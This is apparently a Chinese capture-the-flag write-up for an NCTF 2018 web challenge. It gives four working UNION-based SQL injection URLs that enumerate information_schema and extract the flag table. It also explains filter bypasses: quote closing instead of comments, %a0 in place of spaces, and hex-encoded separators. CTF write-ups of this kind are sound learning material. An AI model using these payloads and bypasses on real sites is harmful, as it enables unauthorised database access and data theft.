nctf 2018 web复现-手工sql注入

http://ctfgame.acdxvfsvd.net:20001/index.php?id=1'%a0union%a0select%a0database(),(select%a0SCHEMA_NAME%a0from%a0information_schema.SCHEMATA%a0limit%a02,1),3||'1数据库名

http://ctfgame.acdxvfsvd.net:20001/index.php?id=1'%a0union%a0select%a0database(),(select%a0table_NAME%a0from%a0information_schema.tables%a0where%a0TABLE_SCHEMA="flaaaaaaag"%a0limit%a00,1),3||'1

http://ctfgame.acdxvfsvd.net:20001/index.php?id=1'%a0union%a0select%a0database(),(select%a0COLUMN_NAME%a0from%a0information_schema.COLUMNS%a0where%a0TABLE_SCHEMA="flaaaaaaag"and%a0TABLE_NAME="f144444444g"%a0limit%a00,1),3||'1

http://ctfgame.acdxvfsvd.net:20001/?id=1'%a0union%a0select%a0user(),(SELECT%a0GROUP_CONCAT(th1s_1s_flag%a0SEPARATOR%a00x3c62723e)%a0FROM%a0flaaaaaaag.f144444444g),3||'1

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

以下为手工注入基础：参考http://blog.51cto.com/13520190/2126037

对于手工注入绕过：参考http://www.cnblogs.com/Vinson404/p/7253255.html

本题的考点：

1.id=1'注入点的查询；

2.绕过注释符号（#，--(后面跟一个空格））过滤：

id=1' union select 1,2,3||'1

最后的or '1闭合查询语句的最后的单引号，或者：

id=1' union select 1,2,'3

3.SELECT%a0GROUP_CONCAT(th1s_1s_flag%a0SEPARATOR%a00x3c62723e中的16进制绕过，不过好像直接用SELECT%a0GROUP_CONCAT(th1s_1s_flag）也可以，读者只需要感受一下这样的思维

4.空格绕过%a0=空格